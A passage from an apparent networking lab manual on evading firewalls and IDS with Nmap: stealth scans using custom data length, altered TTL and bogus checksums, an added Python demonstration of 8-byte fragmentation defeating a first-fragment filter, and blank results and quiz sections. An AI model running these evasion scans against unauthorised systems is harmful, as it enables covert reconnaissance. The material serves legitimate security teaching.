TCP segment has a length of 64 bytes.
Command: nmap -sS -Pn --data-length 64 -F 10.10.179.150

Figure 8.2 Wireshark to generate ip packets with specific length

3. By manipulating the TTL value

Nmap gives you further control over the different fields in the IP header. One of the fields you can
control is the Time-to-Live (TTL). Nmap's --ttl VALUE option sets the TTL to a custom value.
This option might be useful if you think the default TTL exposes your port scan activities.

Command: nmap -sS -Pn --ttl 81 -F 10.10.179.150

Figure 8.3 Manipulate TTL value

4. Send packets with bogus TCP/UDP checksums.

The --badsum option asks Nmap to use an invalid TCP, UDP or SCTP checksum for packets sent to target
hosts. Since virtually all host IP stacks properly drop these packets, any responses received are likely
coming from a firewall or IDS that did not bother to verify the checksum.

Command: nmap -sS -Pn --badsum -F 10.10.179.150


Figure 8.4 Send packets with bogus TCP/UDP checksums
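As an added example (not code from the lab manual), the following Python script builds a 24-byte TCP SYN probe of the kind a -sS scan sends, cuts it into 8-byte IP fragments as -f does, and compares a stateless inspector that only looks at the first fragment with one that reassembles the segment and also verifies the checksum, which is the check a --badsum probe fails. Source and destination addresses, ports and the sequence number are constructed values.

```python
import socket
import struct

# Constructed example, not code from the manual: a 24-byte TCP SYN probe (20-byte
# header + 4-byte MSS option) such as an Nmap -sS scan sends, split into 8-byte IP
# fragments as `nmap -f` does. Addresses and ports used with it are made up.

def _ones_complement_sum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def tcp_checksum(src: str, dst: str, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header and the segment (its checksum field zeroed)."""
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(segment))
    return (~_ones_complement_sum(pseudo + segment)) & 0xFFFF

def build_syn(src: str, dst: str, sport: int, dport: int, badsum: bool = False) -> bytes:
    """SYN with an MSS option; badsum=True stores a corrupted checksum, like `nmap --badsum`."""
    seg = struct.pack("!HHIIBBHHH", sport, dport, 0x11223344, 0, 6 << 4, 0x02, 1024, 0, 0)
    seg += struct.pack("!BBH", 2, 4, 1460)  # option kind 2 (MSS), length 4, value 1460
    csum = tcp_checksum(src, dst, seg)
    if badsum:
        csum ^= 0xFFFF  # inverting every bit guarantees a wrong checksum
    return seg[:16] + struct.pack("!H", csum) + seg[18:]

def fragment(segment: bytes, size: int = 8) -> list:
    """Split into (fragment offset, data) pieces of `size` bytes, as the IP layer does under -f."""
    return [(off, segment[off:off + size]) for off in range(0, len(segment), size)]

def first_fragment_sees_syn(frags: list) -> bool:
    """Stateless filter: inspects only the offset-0 fragment; the flags byte is TCP offset 13."""
    first = dict(frags)[0]
    return len(first) > 13 and bool(first[13] & 0x02)

def inspect_reassembled(frags: list, src: str, dst: str) -> dict:
    """Reassembling IDS check: rebuild the segment, then read port and flags and verify the checksum."""
    seg = b"".join(chunk for _, chunk in sorted(frags))
    stored = struct.unpack("!H", seg[16:18])[0]
    zeroed = seg[:16] + b"\x00\x00" + seg[18:]
    return {
        "dport": struct.unpack("!H", seg[2:4])[0],
        "syn": bool(seg[13] & 0x02),
        "checksum_ok": tcp_checksum(src, dst, zeroed) == stored,
        "fragments": len(frags),
    }
```

With 8-byte fragments the offset-0 fragment carries only the two port numbers, so first_fragment_sees_syn() returns False while inspect_reassembled() reports the SYN to the destination port; a probe built with badsum=True reassembles cleanly but fails the checksum check.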

Results:
By fragmenting the packets with 8 bytes of data:

By generating IP packets with a specific length.

Figure 8.5 Results

By manipulating the TTL value.

By sending packets with bogus TCP/UDP checksums.

Figure 8.6 Results

8.6 Simulated output:


8.7 Conclusion:

……………………………………………………………………………………………………………
……………………………………………………………………………………………………………
……………………………………………………………………………………………………………
……………………………………………………………………………………………………………

8.8 Questions:

1. A ____________ controls access to a network by blocking or permitting traffic based on
security rules, while _____________ monitors and analyses network traffic for suspicious
activities to detect potential threats.
2. Types of IDS are:
_____________________________________________________________________________
_____________________________________________________________________________
3. Types of firewall are:
_____________________________________________________________________________
_____________________________________________________________________________
